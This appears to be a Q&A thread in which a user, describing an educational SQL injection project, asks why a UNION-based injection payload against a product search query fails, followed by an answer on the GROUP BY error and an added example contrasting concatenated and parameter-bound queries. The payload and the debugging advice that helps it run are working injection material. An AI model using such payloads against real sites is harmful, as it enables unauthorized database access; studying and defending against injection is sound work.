SQL query seems valid, but it won't run

Problem description Votes: -1 Answers: 1

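I am trying to test an educational project about SQL injection, but I am stuck on this. I found some helpful articles and questions, even on Stack Overflow, but nothing helped. Can you please tell me what is wrong with this code?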

SELECT pp.product_id, pp.product_price AS product_price, 
       pp.product_name AS product_name, pp.quantity, pp.main_image, 
       pp.sale, pp.sale_price, pi.hash, pi.ext 
FROM presto_products pp 
LEFT JOIN presto_product_images pi ON pi.product_id = pp.product_id 
    AND pi.del = 0 
    AND pi.tab = 0 
WHERE pp. del = 0 
AND pp.product_price IS NOT NULL 
AND pp.product_price != 0 
AND pp.publish = 1 
AND ( pp.product_name LIKE '%swiss nano%' ) 
AND 1=2 

UNION ALL 

SELECT 1,2,3,4,5,6,7,8,9 -- - %' 
OR pp.barcode LIKE '%swiss nano%' ) 
AND 1=2 

UNION ALL 

SELECT 1,2,3,4,5,6,7,8,9 -- - %' ) 
GROUP BY pp.product_id

This is the error message: You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'GROUP BY pp.product_id'

This is the normal query for a regular search, for example when the search keyword is 'swiss':

SELECT pp.product_id, pp.product_price
AS product_price, pp.product_name
AS product_name, pp.quantity, pp.main_image, pp.sale, pp.sale_price, pi.hash, 
pi.ext
FROM presto_products pp
LEFT JOIN presto_product_images pi
ON pi.product_id = pp.product_id
AND pi.del = 0 AND pi.tab = 0
WHERE pp.del = 0
AND pp.product_price IS NOT NULL
AND pp.product_price != 0 AND pp.publish = 1
AND ( pp.product_name LIKE '%SWISS%' OR pp.barcode LIKE '%SWISS%' )
GROUP BY pp.product_id

And this is my payload:

swiss nano%' ) AND 1=2 UNION ALL SELECT 1,2,3,4,5,6,7,8,9 -- - 
sql sql-injection
1 answer
0
votes

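If you think that GROUP BY pp.product_id is applied to the results of all 3 unioned queries, then you are wrong. It is applied only to the last query, which has no FROM clause, and of course GROUP BY is invalid there. What you can do is use your query as a subquery: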

select t.product_id, .........
from (
  <your query here>
) t
group by t.product_id
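
An added example, not part of the question or the answer: the search query built by string concatenation beside a parameter-bound form, run against the payload string quoted in the question. It assumes Python's sqlite3 with an in-memory database standing in for MariaDB, a query trimmed to three columns, and constructed rows; `make_db`, `search_concat`, `search_bound` and `outcome` are hypothetical names.

```python
import sqlite3

# The payload string quoted in the question, used here only as test input.
PAGE_PAYLOAD = "swiss nano%' ) AND 1=2 UNION ALL SELECT 1,2,3,4,5,6,7,8,9 -- - "

# Trimmed form of the question's search query (assumption: three columns only).
BASE = ("SELECT pp.product_id, pp.product_name, pp.product_price "
        "FROM presto_products pp "
        "WHERE pp.del = 0 AND pp.publish = 1 AND ")

def make_db():
    # Constructed sample rows in an in-memory SQLite database.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE presto_products (product_id INTEGER PRIMARY KEY, "
               "product_name TEXT, barcode TEXT, product_price REAL, "
               "publish INTEGER, del INTEGER)")
    db.executemany("INSERT INTO presto_products VALUES (?,?,?,?,?,?)",
                   [(1, "Swiss Nano Watch", "SN-001", 120.0, 1, 0),
                    (2, "Desk Lamp", "DL-002", 35.0, 1, 0)])
    return db

def search_concat(db, keyword):
    # Weak: the keyword becomes part of the SQL text, so quotes in it are parsed.
    sql = (BASE + "( pp.product_name LIKE '%" + keyword + "%' OR "
           "pp.barcode LIKE '%" + keyword + "%' ) GROUP BY pp.product_id")
    return db.execute(sql).fetchall()

def search_bound(db, keyword):
    # Hardened: the keyword is bound as a value; LIKE wildcards are escaped too.
    esc = keyword.replace("!", "!!").replace("%", "!%").replace("_", "!_")
    pattern = "%" + esc + "%"
    sql = (BASE + "( pp.product_name LIKE ? ESCAPE '!' OR "
           "pp.barcode LIKE ? ESCAPE '!' ) GROUP BY pp.product_id")
    return db.execute(sql, (pattern, pattern)).fetchall()

def outcome(search, db, keyword):
    # Returns ("rows", [...]) or ("sql-error", message) so both paths compare.
    try:
        return ("rows", search(db, keyword))
    except sqlite3.Error as exc:
        return ("sql-error", str(exc))

if __name__ == "__main__":
    db = make_db()
    for fn in (search_concat, search_bound):
        print(fn.__name__, outcome(fn, db, "swiss"), outcome(fn, db, PAGE_PAYLOAD))
```

A database syntax error triggered by a search keyword, like the one in the question, is itself a sign that user input is reaching the SQL parser; with bound parameters the same input returns an empty result and no error.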